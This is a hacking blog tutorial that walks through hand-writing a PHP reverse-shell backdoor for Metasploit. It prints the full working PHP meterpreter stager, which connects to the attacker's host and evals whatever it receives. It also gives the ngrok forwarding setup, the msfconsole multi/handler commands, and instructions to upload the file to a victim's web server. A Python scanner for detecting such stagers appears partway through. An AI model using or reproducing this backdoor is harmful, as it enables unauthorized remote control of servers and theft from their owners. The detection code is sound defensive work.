Manually Create PHP Backdoor Of Metasploit

Hi guys, we are back with another tutorial in which we are going to teach you how to manually create a PHP backdoor for Metasploit and then how to exploit it. So if you guys are excited, let's get started.



Lots of people ask me: what is the advantage of manually coding a payload for Metasploit when we can generate it with Metasploit?

Suppose an attacker has access to the victim's device for some time and has no other equipment (an Android phone, a laptop, etc.) for generating a backdoor. In that case they can manually code the backdoor on the victim's device and then exploit it at any time with Metasploit.

So first of all you need to set up port forwarding, because as we all know PHP is used in web applications, which is why the target is outside the local area network. We can do temporary port forwarding using an ngrok server, or for permanent access we can use the portmap website (as we mentioned in our previous posts).


  • Ngrok (Temporary Port Forwarding)
  • Portmap (Permanent Port Forwarding)

In my case I am going to show a demo using ngrok for temporary port forwarding, which gives the following configuration.

> tcp://0.tcp.ngrok.io:14817 -> localhost:4444

In your case it will always be different.

So it's time to code the PHP backdoor. (If you have basic PHP knowledge your work is easy; if you don't, just copy and paste the given code, but remember to add your local host and local port in the backdoor.)

-------------------------------------------------(Copy Given Code)-------------------------------------------------------------

/*<?php /**/ error_reporting(0); $ip = 'lhost'; $port = lport; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

--------------------------------------------------------------------------------------------------------------------------------------

Now save this file as filename.php. You can use Ctrl + F to find lhost and lport in the code and then put in your details.

Note: It is important to add lhost and lport in the code, otherwise the payload doesn't respond.

Everything is done; now set up the handler in your Metasploit console with the given commands.

$ msfconsole

$ use exploit/multi/handler

$ set payload php/meterpreter/reverse_tcp

$ set lhost 0.0.0.0

$ set lport 4444

$ exploit

Now you just need to upload this PHP file to the web server and then load www.example.com/filename.php. Your meterpreter session has now started. Use the help command for options.
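Seen from the web server's side, the file above has a recognisable shape: it opens an outbound TCP connection, reads a 4-byte length followed by that many bytes, and hands them to eval(). The Python scanner below is an added example, not part of the original post; it flags PHP files showing that combination, and its trait names, verdict labels, suffix list and sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Traits taken from the stager shown above; names and verdict labels are this example's own.
# The raw text is searched as-is, because the file opens with "/*<?php /**/" and
# naive comment stripping would be confused by it.
TRAITS = {
    "outbound_socket": re.compile(r"\b(stream_socket_client|fsockopen|socket_connect)\b"),
    "length_prefix": re.compile(r"unpack\s*\(\s*[\"']N"),
    "dynamic_exec": re.compile(r"\b(eval|create_function)\s*\((?:\s*''\s*,)?\s*\$"),
    "suhosin_check": re.compile(r"suhosin\.executor\.disable_eval"),
    "errors_silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
}
# Core behaviour: connect out, read a length-prefixed blob, execute it.
CORE = {"outbound_socket", "length_prefix", "dynamic_exec"}
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".phar"}  # assumed handler mappings

def scan_php(source):
    """Return a verdict and the matched trait names for one PHP source string."""
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(source))
    if CORE.issubset(hits):
        verdict = "stager-like"
    elif {"outbound_socket", "dynamic_exec"}.issubset(hits):
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "traits": hits}

def scan_tree(root):
    """Scan every PHP-handled file under a web root; return only non-clean results."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            result = scan_php(path.read_text(errors="replace"))
            if result["verdict"] != "clean":
                findings.append((str(path), result))
    return findings

# Constructed samples (non-functional fragments, for exercising the rules only).
SAMPLE_STAGER = ('<?php error_reporting(0); $s = fsockopen($ip, $port); '
                 '$a = unpack("Nlen", fread($s, 4)); /* ... */ eval($b);')
SAMPLE_BENIGN = '<?php $fp = fsockopen("mail.example.com", 25); fclose($fp);'

if __name__ == "__main__":
    for label, src in (("stager", SAMPLE_STAGER), ("benign", SAMPLE_BENIGN)):
        print(label, scan_php(src))
```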

I hope this information is helpful for you. If you found something interesting on our blog, please make sure to subscribe for future updates. Thanks for visiting, have a nice day.

Mohit Saran(Hacker's King)